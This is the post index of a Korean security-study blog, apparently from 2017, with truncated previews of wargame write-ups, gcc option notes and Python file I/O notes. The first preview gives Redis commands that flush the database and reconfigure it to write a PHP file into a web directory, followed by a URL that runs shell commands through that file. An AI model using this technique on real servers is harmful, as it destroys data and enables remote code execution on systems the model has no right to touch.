분류 전체보기
redis를 통해 webshell upload
redis를 통해 webshell upload
2017.10.05webshell upload```bashFLUSHALLeval 'redis.call("set", "", "test"); redis.call("config", "set", "dir", "/var/www/html/cache/"); redis.call("config", "set", "dbfilename", "exploit.php");' 0savequit``````http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;```REDIS0008�redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem�� �repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-..
gcc options
gcc options
2017.10.01gcc공유 라이브러리 제작 / 사용 옵션```-fPIC```PIC : Position-Independent Code를 생성한다.shared library같은 경우 메모리의 어느 위치에 로딩되는지가 컴파일 타임에 결정되지 않기 때문에 절대주소 대신 상대주소(offset)를 사용하도록 컴파일하는 옵션이다. 즉, 다른 바이너리에서 이 라이브러리의 함수를 호출할 때 PLT와 GOT를 사용하도록 하는 옵션이라고 생각하면 된다.library의 mapping 주소 + offset이 해당 symbol의 주소가 된다. mapping 주소는 ldd로, offset은 nm으로 확인 가능하다. ```-shared```shared library(.so)를 생성하겠다는 의미. ```-llibrary```library는 함수 이름..
[webhacking.kr] 52 : CRLF Injection, HTTP response splitting
[webhacking.kr] 52 : CRLF Injection, HTTP response splitting
2017.09.30이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 13 : Blind SQL Injection : Subquery, 다중행 연산자
[webhacking.kr] 13 : Blind SQL Injection : Subquery, 다중행 연산자
2017.09.29이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 9 : Blind SQL Injection : IF는 이상해
[webhacking.kr] 9 : Blind SQL Injection : IF는 이상해
2017.09.28이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 44 : html injection?
[webhacking.kr] 44 : html injection?
2017.09.28이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 61 : $q['id']
[webhacking.kr] 61 : $q['id']
2017.09.27이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 40 : Blind SQL Injection 서버 측 소스 예측은 신중하게
[webhacking.kr] 40 : Blind SQL Injection 서버 측 소스 예측은 신중하게
2017.09.25이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 39 : replace는 답이 없을 수 있다.
[webhacking.kr] 39 : replace는 답이 없을 수 있다.
2017.09.25이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[webhacking.kr] 35 : SQL Injection - 0b 바이너리로 넘기기
[webhacking.kr] 35 : SQL Injection - 0b 바이너리로 넘기기
2017.09.24이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
Error-based SQL injection
Error-based SQL injection
2017.09.23이 글은 보호되어 있기 때문에 이것을 보려면 암호가 필요합니다.
[python] File IO open 함수 및 내장함수
[python] File IO open 함수 및 내장함수
2017.09.22open 함수```python>>> fd = os.open("./f", os.O_RDWR) >>> fd8>>> fdo = os.fdopen(fd, "wb")>>> fdo>>> fdo2 = open("./f", "wb")>>> fdo2`````python Built-in open("file name") return file object````python os.open("file name") return fd````python os.fdopen(fd) return file object``그래서, ``python Built-in open("./f") == os.fdopen(os.open("./f"))`` 이다. 내장함수```pythonall() #iterable을 입력받아 요소들 중 거짓이 하나도 없으면 Tr..